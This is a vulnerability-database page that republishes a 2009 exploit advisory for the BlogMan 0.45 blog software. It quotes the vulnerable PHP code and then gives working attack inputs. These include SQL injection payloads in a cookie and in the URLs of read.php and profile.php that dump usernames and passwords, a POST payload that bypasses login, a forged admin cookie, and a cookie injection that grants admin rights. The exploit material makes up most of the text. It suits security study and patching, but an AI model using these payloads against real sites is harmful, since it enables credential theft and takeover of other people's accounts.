Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BlogMan 0.45 Multiple Remote Vulnerabilities

🗓️ 02 Mar 2009 00:00:00Reported by drosophilaType 
zdt
 zdt🔗 0day.today👁 15 Views

BlogMan 0.45 Multiple Remote Vulnerabilities discovered by Salvatore "drosophila" Fresta including SQL Injection, Authentication Bypass, and Privilege Escalation

Code
============================================
BlogMan 0.45 Multiple Remote Vulnerabilities
============================================



*******   Salvatore "drosophila" Fresta   *******


Application:       BlogMan
                          http://sourceforge.net/projects/blogman/
Version:             0.45
Bug:                   * Multiple SQL Injection
                          * Authentication Bypass
                          * Privilege Escalation
Exploitation:      Remote
Date:                 1 Mar 2009
Discovered by:  Salvatore "drosophila" Fresta
        	

*************************************************

- BUGS

This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.

#[1] SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: index.php, register.php, viewall.php
	
	The following lines are improperly checked:
	
	/*
		if (isset($_COOKIE['blogmanuserid'])) {
			$id = $_COOKIE['blogmanuserid'];
			$query = "SELECT * FROM user WHERE UserID='".$id."'";
			$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
		    echo "<p class='loginusername'><a
href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
	*/
	
	Using a cookie editor it is possible to edit that cookie
	and manage the query, as follows:
	
	Name: blogmanuserid
	Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
	Server: target_server (example: localhost)
	Path: /blogman/


#[2] SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: read.php
	
	This bug allows a guest to view the username
	and password of a registered user.
	
	http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
	

#[3] SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: profile.php
	
	This bug allows a guest to view the username
	and password of a registered user.
	
	http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23


#[1] Authentication Bypass:

	Requisites: magic_quotes_gpc = off

	File affected: doLogin.php
	
	The following lines are improperly checked:
	
	/*
		$un = $_POST['un'];
		$pw = $_POST['pw'];
		
		...
		
		$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
		$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserName='".$un."'"));
	        if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
		    $expires = time() + 3*24*60*60;
		    setcookie("blogmanuserid", $userRow['UserID'], $expires);
	        }
	*/
	
	Using a SQL Injection bug it is possible to bypass
	conditions and to set an arbitrary UserID value.
	
	The following information must be sent using
	POST method to doLogin.php
	
	un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
	pw = mypass
	
	The First value is UserID, the third value is the password,
	the tenth value is UserDisabled and the eleventh value is
	UserActive.


#[2] Authentication Bypass:

	Requisites: none
	
	File affected: all
	
	It is possible to bypass the authentication
	system by creating a cookie named 'blogmanuserid',
	and inserting the value of a registered user id
	into the content(sometimes 1 for admin):
	
	Name: blogmanuserid
	Content: 1	
	Server: target_server (example: localhost)
	Path: /blogman/
	
	
Privilege Escalation:

	Requisites: magic_quotes_gpc = off

	File affected: admin.php
	
	It is possible to escalate privileges using
	a SQL Injection bug through a cookie.
	
	The following lines are improperly checked:
	
	/*
	        $id = $_COOKIE['blogmanuserid'];
		$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
		if (!$user['UserCanAdmin']) {
			echo "<meta http-equiv='refresh' content='0;index.php'></head></html>";
		} else {
			...
		}
	*/
	
	Name: blogmanuserid
	Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#	
	Server: target_server (example: localhost)
	Path: /blogman/
	
	The first value is UserID and the last value
	is UserCanAdmin.


*************************************************



#  0day.today [2018-03-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Mar 2009 00:00Current
7.1High risk
Vulners AI Score7.1
blogmanvulnerabilitiessalvatore "drosophila" frestasql injectionauthentication bypassprivilege escalationremote exploitationsourceforge
15